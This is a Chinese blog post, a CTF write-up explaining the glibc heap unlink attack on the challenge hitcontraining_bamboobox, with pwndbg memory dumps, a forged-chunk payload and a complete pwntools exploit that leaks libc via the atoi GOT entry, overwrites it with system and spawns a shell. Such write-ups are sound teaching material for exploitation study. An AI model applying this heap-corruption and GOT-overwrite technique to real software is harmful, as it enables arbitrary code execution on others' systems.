记录unlink的原理及例题分析

已于 2023-04-12 20:52:01 修改
阅读量174 收藏 1
点赞数 2
分类专栏: buuctf_pwn 文章标签: python
于 2023-04-12 20:47:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73954357/article/details/130116325
版权

记录unlink的原理及例题分析

unlink攻击实质:先前合并,绕过unlink检查,实现任意地址写

给出unlink几条重要的代码

// 由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致(size检查)
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \第一个检查
      malloc_printerr ("corrupted size vs. prev_size");               \
// 检查 fd 和 bk 指针(双向链表完整性检查)
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      \第二个检查
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \

FD->bk = BK
BK->fd = FD

实现unlink攻击的条件

1 . 可以修改next_chunk的pre_size和size位 (为了绕过第一个检查,实现合并)

2 . 不能开pie (要知道需要合并的地址,所以不能开pie)

结合题目更好理解,下面给出例题(hitcontraining_bamboobox)

1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit

可以看出是一个功能齐全的堆,但是change函数里有漏洞,size任意输入,导致我们可以修改下一个堆块的pre_size和size位

alloc(0x20,"aaaa")      
alloc(0x80,"bbbb")
alloc(0x30,"cccc")      #防止与top chunk 合并 下面调试就不给出 index 2的图了

看一下空间是怎样的

pwndbg> x/20gx  0x1eda020 
0x1eda020:	0x0000000000000000	0x0000000000000031           #对应 index 0
0x1eda030:	0x0000000a61616161	0x0000000000000000 
0x1eda040:	0x0000000000000000	0x0000000000000000
0x1eda050:	0x0000000000000000	0x0000000000000091           #对应 index 0
0x1eda060:	0x0000000a62626262	0x0000000000000000
0x1eda070:	0x0000000000000000	0x0000000000000000

target = 0x6020c8  
fd = target - 0x18    #绕过第二个检查
bk = target - 0x10    #绕过第二个检查

payload = p64(0) + p64(0x20)
payload += p64(fd) + p64(bk)

payload += p64(0x20) + p64(0x90)             #绕过第一个检查
change(0,payload)

第一个检查很容易理解,就是检查一下chunk1 的pre_size大小是否与chunk0一致(size检查)

是怎么绕过第二个检查的呢?很简单,附上一张图片更好理解

从图中第一行图很容易看出
在这里插入图片描述

target = 0x6020c8
FD =  target - 0x18 =0x602b0
BK =   target - 0x10 =0x602b8
绕过第二个检查如下
FD->bk == P   (0x602b0 +0x18==0x6020c8)
BK->fd == P    (0x602b8 +0x10==0x6020c8)

调试看一下

0x11b9020           0x0                 0x30                 Freed                0x0              0x20
0x11b9050           0x20                0x90                 Used                 0x

0x11b9020:	0x0000000000000000	0x0000000000000031
0x11b9030:	0x0000000000000000	0x0000000000000020
0x11b9040:	0x00000000006020b0	0x00000000006020b8
0x11b9050:	0x0000000000000020	0x0000000000000090
0x11b9060:	0x0000000a62626200	0x0000000000000000

fd 和bk 被填入 ,chunk0 被认为free状态了 ,只要free chunk1 就能绕过两个检查,并且 然chunk0和chunk1合并,也就是上面讲到的向前合并

free(1)

调试看一下

0x169d020:	0x0000000000000000	0x0000000000000031
0x169d030:	0x0000000000000000	0x00000000000000b1       
0x169d040:	0x00007fbcd6dc3b78	0x00007fbcd6dc3b78
0x169d050:	0x0000000000000020	0x0000000000000090
0x169d060:	0x0000000a62626200	0x0000000000000000

pwndbg> x/20gx 0x6020c0
0x6020c0 <itemlist>:	0x0000000000000020	0x00000000006020b0
0x6020d0 <itemlist+16>:	0x0000000000000000	0x0000000000000000
0x6020e0 <itemlist+32>:	0x0000000000000030	0x000000000169d0f0

向前合并 ,之前的0x20变成了b1 (0x20+0x90+1(in_use) )

0x6020c8的值变成了0x6020b0,这是怎么变的呢? 还记得上面给出的几条重要代码吗,当绕过两个检查后,会改BK->fd 的值

FD->bk = BK
BK->fd = FD

BK->fd 不就是 0x6020c8 , FD = target - 0x18 =0x602b0

BK->fd = FD 不就是 *( 0x6020c8 ) = 0x602b0

整个流程下来,我们就完成了 unlink攻击, 可以实现地址任意写了

接下来 ,我们往chunk0 写入数据 就是往 0x602b0 写数据

下面的比较简单 ,我就直接 给出思路和完整exp

思路: 修改chunk0 的位置为 atoi的got表 ,再show() 可以泄露 atoi的got 进而 泄露 libc

再用change函数 改atoi的got 为system函数 ,就会导致 执行atoi函数时 其实就是再执行system函数

exp

from pwn import *
p=remote('node4.buuoj.cn',29387)
context.log_level = 'debug'
elf = ELF("./pwn")
libc =ELF('23.64')
atoi_got = elf.got['atoi']
def d():
   gdb.attach(p)
   pause()
def show():
    p.recvuntil("Your choice:")
    p.sendline(str(1))

def alloc(size,content):
    p.recvuntil("Your choice:")
    p.sendline(str(2))
    p.recvuntil("length of item name:")
    p.sendline(str(size))
    p.recvuntil("name of item:")
    p.sendline(content)

def change(idx,content):
    p.recvuntil("Your choice:")
    p.sendline(str(3))
    p.recvuntil("index of item:")
    p.sendline(str(idx))
    p.recvuntil("length of item name:")
    p.sendline(str(len(content)))
    p.recvuntil("new name of the item:")
    p.sendline(content)

def free(idx):
    p.recvuntil("Your choice:")
    p.sendline(str(4))
    p.recvuntil("index of item:")
    p.sendline(str(idx))

alloc(0x20,"aaaa")
alloc(0x80,"bbbb")
alloc(0x30,"cccc")

target = 0x6020c8 
fd = target - 0x18
bk = target - 0x10

payload = p64(0) + p64(0x20)
payload += p64(fd) + p64(bk)

payload += p64(0x20) + p64(0x90)
change(0,payload)

free(1)

payload = p64(0) * 2

payload += p64(0x30) + p64(atoi_got)
print(hex(atoi_got))
change(0,payload)

show()
atoi_addr = u64(p.recvuntil("\x7f")[-6:]+'\x00\x00')
log.success(hex(atoi_addr))

libc_base = atoi_addr - libc.sym['atoi']
system = libc_base + libc.sym['system']
print(hex(system))
payload = p64(system)
change(0,payload)

p.recvuntil("Your choice:")
p.sendline("/bin/sh\x00")

p.interactive()
zIxyd
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux文件和目录管理命令----unlink命令
redrose2100的博客
01-12 1492
unlink命令是Linux系统中一个用于删除文件的命令。与常见的rm命令不同,unlink命令不会将文件放入回收站,而是直接删除文件,并且不会提示用户确认操作,因此需要谨慎使用。
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
Linux下unlink函数的使用
热门推荐
judgejames的博客
11-05 4万+
一、头文件 #include<unistd.h> 二、函数原型 int unlink(const char *pathname); 三、函数介绍 unlink()函数功能即为删除文件。执行unlink()函数会删除所给参数指定的文件。 注意: 执行unlink()函数并不一定会真正的删除文件,它先会检查文件系统中此文件的连接数是否为1,如果不是1说明此文件还有其他链接对象,因此只对此文件的连接数进行减1操作。若连接数为1,并且在此时没有任何进程打开该文件......
unlink快速入门
abelxu
11-12 3129
0x01 正常unlink 当一个bin从记录bin的双向链表中被取下时,会触发unlink。常见的比如:相邻空闲bin进行合并,malloc_consolidate时。unlink的过程如下图所示(来自CTFWIKI)主要包含3个步骤,就是这么简单。 根据p的fd和bk获得双向链表的上一个chunk FD和下一个chunk BK 设置FD->bk=BK 设置BK->fd=FD 下面看一下unlink的源码。 #安装源码 apt install glibc-source #下面目录下有一个
文件删除与数据安全性:深入了解 unlink 函数
最新发布
深耕嵌入式领用多年, 致力于分享嵌入式领域技术!
07-01 982
文件删除与数据安全性:深入了解 unlink 函数
unlink原理及利用
AFCC_的博客(Web_Dog)
02-27 1771
unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。但这里的前和后都是指在物理内存中的位置,而不是fd和bk链表所指向的堆块。 以当前的chunk为基准,将preivous free chunk合并到当前chunk称为向后合...
Linux unlink函数和删除文件的操作方法
01-09
理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `unlink`函数主要负责两件事:一是从目录结构中删除文件的目录项,二是减少文件的inode(索引节点)的引用计数。这两个...
PHP unlink与rmdir删除目录及目录下所有文件实例代码
10-18
主要介绍了PHP unlink与rmdir删除目录及目录下所有文件的实例代码,需要的朋友可以参考下
linux_pwn(4)--unlink&&hitcon2014_stkof&&hitcontraining_bamboobox
azraelxuemo的博客
03-08 4390
文章目录What is unlinkunsorted bin释放时候的关键源码接下来就是要绕过unlink checkpwn题思路例题保护机制add函数delete函数edit函数开始做题准备框架调试总结 What is unlink unlink其实是unsorted bin在free的时候的一个操作,他的本意其实也是合并空闲的块方便下一次分配,但往往我们可以通过unlink欺骗unsoted bin的空闲块管理链表,产生任意地址写的效果 unsorted bin释放时候的关键源码 else if (!c
好好说话之unlink
hollk’s blog
09-17 5345
堆溢出的第三部分unlink,这可能是有史以来我做的讲解图最多的一篇文章了~~累死~~ 。可能做pwn的人都应该听过unlink,见面都要说声久仰久仰。学unlink的时候走了一些弯路,也是遇到了很多困扰的问题,会在后面的内容中做出标注。由于写的比较详细,所以字数依然还是一如既往的多,我会在适当的时候提醒向前回顾某一处知识点,也希望在看例题的时候能够跟着一起做一下 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Unlink
kelxLZ的博客
07-03 1583
Author:ZERO-A-ONE Date:2021-07-03 一、unlink原理 简介:俗称脱链,就是将链表头处的free堆块unsorted bin中脱离出来然后和物理地址相邻的新free的堆块合并成大堆块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlinkunlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
c语言中unlink()函数详解
Wmll1234567的博客
08-14 1万+
头文件:#include &lt;unistd.h&gt; 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连接会被删除。 返回值:成功则返回0, ...
unlink学习
weixin_45427676的博客
04-14 539
unlink原理 unlink这种利用方式源于glibc堆管理的一种特性,即当free一个chunk时,若该chunk处于双向链表中,则会检测其相邻块是否空闲,若处于空闲状态,则会将该空闲块从双向链表中取出,然后合并,这个取出操作就是unlinkunlink其实就是删除双向链表中的目标结点,这个删除过程本质上是对其前后结点的指针重新赋值,若我们对其指针进行巧妙的设置,则可能控制任意内存地址空间,...
House of einherjar
tbsqigongzi的博客
07-31 462
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
Linux下堆溢出利用1-unlink基本原理
haibiandaxia的博客
08-08 947
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成asdfffffsdfsafasf如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
Linux系统调用-- unlink函数详解
zhaozhanyong的专栏
05-17 4887
Linux系统调用-- unlink函数详解 功能描述:从文件系统中删除一个名称。如果名称是文件的最后一个连接,并且没有其它进程将文件打开,名称对应的文件会实际被删除。用法:#include int unlink(const char *pathname);参数:pathname:指向需解除连接的文件名。返回说明:成功执行时,返回0。失败返回-1,err
14-unlink函数和删除文件
网络安全
07-02 5573
  在阅读此篇之前,需要对linux下的硬链接和软链接非常熟悉,如果不熟悉的话可以参考先参考这篇文章:https://blog.csdn.net/q1007729991/article/details/53424961 1. unlink函数   对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删...
unlink 入门
qq_42220888的博客
08-03 253
关于ctf pwn unlink学习
深入glibc堆内存原理及利用
《Heap Exploitation(简体中文)》是一本旨在帮助读者了解“堆内存”内部工作原理的书籍,尤其是针对glibc的malloc和free函数的使用。本书并非官方译本,目的是帮助读者更好地理解堆内存的工作原理。 在本书中,作者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zIxyd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值